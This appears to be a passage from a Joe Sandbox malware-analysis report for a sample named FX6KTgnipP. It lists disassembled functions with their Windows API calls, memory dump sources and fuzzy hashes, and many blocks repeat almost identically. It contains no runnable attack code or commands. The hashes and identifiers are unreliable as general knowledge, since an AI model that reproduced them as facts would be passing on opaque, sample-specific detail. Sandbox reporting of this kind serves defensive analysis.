                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 72bad791e7d123aba9f4bb222354b2eb4cde10dd7265dee5661e0e2ca794a80a
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: 72bad791e7d123aba9f4bb222354b2eb4cde10dd7265dee5661e0e2ca794a80a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 002649EE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 3bbc0e4a92e756519c09b582bda40c1ed311b4aac8f5e1b1738779c3b4b8b16b
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3bbc0e4a92e756519c09b582bda40c1ed311b4aac8f5e1b1738779c3b4b8b16b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 002649F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: c382e0acba1aef4604ddcef52366a26f803788a0a41b6e06ade23f90e976b86e
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: c382e0acba1aef4604ddcef52366a26f803788a0a41b6e06ade23f90e976b86e
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 002649D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: dfbf03dd951d04ee1c2135d5de8b2242ea83c1318053ea12d4dbdebfb7787cd9
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: dfbf03dd951d04ee1c2135d5de8b2242ea83c1318053ea12d4dbdebfb7787cd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 00264A02 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: dbd16f702ed53e343c10a2c0bbbc783cc76de492a34cb883a7d207814efe1ca4
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: dbd16f702ed53e343c10a2c0bbbc783cc76de492a34cb883a7d207814efe1ca4
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 0024E3D5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,0024E3B1,?,?,00000000,?,?,0024CC21,?), ref: 0024E55F
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024E56E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                            • Opcode ID: 977198a6b2e7ff237713aae21aa89916a1ad13ce60383dc727af14b6c51c7ab2
                                                                                                                                                                            • Instruction ID: 4a018b386e18990e21743ca65ab7c5eeb3bf1181aa24503267deb82d71970a6a
                                                                                                                                                                            • Opcode Fuzzy Hash: 977198a6b2e7ff237713aae21aa89916a1ad13ce60383dc727af14b6c51c7ab2
                                                                                                                                                                            • Instruction Fuzzy Hash: A0411770624352CBEF28EF24D4846AAB3E5FF58720F56451DD98583241E7B4DCA08BA1
                                                                                                                                                                            Function 0024E772 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0024E78C
                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 0024E840
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$BuffersFlushTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1392018926-0
                                                                                                                                                                            • Opcode ID: 396cd5ab528a9fe570eb363a5cbb7fdc5c435cf84aa9c474a80cbd126bb796fb
                                                                                                                                                                            • Instruction ID: 49ced95f5f9ae551a83a09fbb513afc32c21a289291f10ea0884fb7414506474
                                                                                                                                                                            • Opcode Fuzzy Hash: 396cd5ab528a9fe570eb363a5cbb7fdc5c435cf84aa9c474a80cbd126bb796fb
                                                                                                                                                                            • Instruction Fuzzy Hash: D921D231269242ABEB18DE34C895AABFBE8BF95314F05491CF4C583181D329D92CDB62
                                                                                                                                                                            Function 0024E850 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0024E897
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024E8A4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                            • Opcode ID: 00d25e91e1088def1c83594128ec06b69e82db023d175fccb586d65f33fc40b0
                                                                                                                                                                            • Instruction ID: 7b85a0f53a389baf82432ae56e547a849f40f01804af6fe1e4ee8e05c9be4753
                                                                                                                                                                            • Opcode Fuzzy Hash: 00d25e91e1088def1c83594128ec06b69e82db023d175fccb586d65f33fc40b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D11E530620601AFFF289A34CC44B6673E9BB45370F610B28E052925E0D7B0ED65DB60
                                                                                                                                                                            Function 00241CE2 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00241CE9
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00241D01
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_Item_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 896027972-0
                                                                                                                                                                            • Opcode ID: 92900af006ad936717577b1929acd37a2d721978145ae224250639c2256d7a38
                                                                                                                                                                            • Instruction ID: 22c144b3f240731f5df0e523ee7300f2eb5ea82fe16d4b500c5457d57065c64e
                                                                                                                                                                            • Opcode Fuzzy Hash: 92900af006ad936717577b1929acd37a2d721978145ae224250639c2256d7a38
                                                                                                                                                                            • Instruction Fuzzy Hash: AF0184B1A21214DFD729EF64C886BEDB7E8AF58740F54010AF856A72D1D7705AB1CF10
                                                                                                                                                                            Function 0026F124 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00272BE0: GetEnvironmentStringsW.KERNEL32 ref: 00272BE9
                                                                                                                                                                              • Part of subcall function 00272BE0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00272C0C
                                                                                                                                                                              • Part of subcall function 00272BE0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00272C32
                                                                                                                                                                              • Part of subcall function 00272BE0: _free.LIBCMT ref: 00272C45
                                                                                                                                                                              • Part of subcall function 00272BE0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00272C54
                                                                                                                                                                            • _free.LIBCMT ref: 0026F16A
                                                                                                                                                                            • _free.LIBCMT ref: 0026F171
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 400815659-0
                                                                                                                                                                            • Opcode ID: e20f88ee281890ce14d08cb5642a795eb5ab9cc5afc976431b60f66aa54bbd39
                                                                                                                                                                            • Instruction ID: b456d494711b724f702634e2479e3e1062e9e6fe2f9b8762be21e827ac254415
                                                                                                                                                                            • Opcode Fuzzy Hash: e20f88ee281890ce14d08cb5642a795eb5ab9cc5afc976431b60f66aa54bbd39
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE0EC12E39501D6DAA1373A7E4571A12504B833B0B1103F6F42CE60D2CEB448A54595
                                                                                                                                                                            Function 002576A7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,002576EA,00250B6F), ref: 002576B4
                                                                                                                                                                            • GetProcessAffinityMask.KERNEL32(00000000,?,002576EA), ref: 002576BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1231390398-0
                                                                                                                                                                            • Opcode ID: d5ac51ad928270a018e1eb25ab4053b090f7d651b2028751118d31af85267ce1
                                                                                                                                                                            • Instruction ID: f4fe0480863b00b449aa17db8ed24baaf763548e6b07b4451ae1ecfa09bb2e87
                                                                                                                                                                            • Opcode Fuzzy Hash: d5ac51ad928270a018e1eb25ab4053b090f7d651b2028751118d31af85267ce1
                                                                                                                                                                            • Instruction Fuzzy Hash: 30E09232B65507A78F198BB9AC099EB729DAA442453244079A813D3200E974DD0946A4
                                                                                                                                                                            Function 0025F53A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00279B73,000000FF), ref: 0025F578
                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00279B73,000000FF), ref: 0025F57D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856339756-0
                                                                                                                                                                            • Opcode ID: b57a45844c42b55dc05a91fc054a893e2c9c6630ef877556fbfecef295c17267
                                                                                                                                                                            • Instruction ID: 488c81ce11589afe6a2025f0f31b93313e5308305c514a6054a0831271379a53
                                                                                                                                                                            • Opcode Fuzzy Hash: b57a45844c42b55dc05a91fc054a893e2c9c6630ef877556fbfecef295c17267
                                                                                                                                                                            • Instruction Fuzzy Hash: 73F08276608A54AFC701DF69FC45B5AFBE8FB49770F00426AE81AC3760CB75A840CB94
                                                                                                                                                                            Function 0025E849 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0025E86A
                                                                                                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0025E871
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1918208029-0
                                                                                                                                                                            • Opcode ID: fe73752429b0b38da8e5128afa319f9813a652a1cd534ad4855323b53349b2c1
                                                                                                                                                                            • Instruction ID: 559a358ae5d31b675beea9bbed876681f08f0931c51345476c7689df1a5a00d6
                                                                                                                                                                            • Opcode Fuzzy Hash: fe73752429b0b38da8e5128afa319f9813a652a1cd534ad4855323b53349b2c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE09271420218EFCB10DF49C80579DB7F8EF04351F20C05AA88993211D7B0AF54DF90
                                                                                                                                                                            Function 00241E1F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemShowWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3351165006-0
                                                                                                                                                                            • Opcode ID: 6d0c8497c998e0af664e4a75c2913ff314c3be38866fef69b3a15122172d264d
                                                                                                                                                                            • Instruction ID: 1453bbe3ed388d3956049b29022169ba289bfbf42d0800ed4ccbfcb98409447d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d0c8497c998e0af664e4a75c2913ff314c3be38866fef69b3a15122172d264d
                                                                                                                                                                            • Instruction Fuzzy Hash: 68C0123206C200BFCB010BB0EC0DD2EBBA8ABA4212F00CA0AB0A9C0060C239C010DB11
                                                                                                                                                                            Function 00241CC4 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00241CD2
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00241CD9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
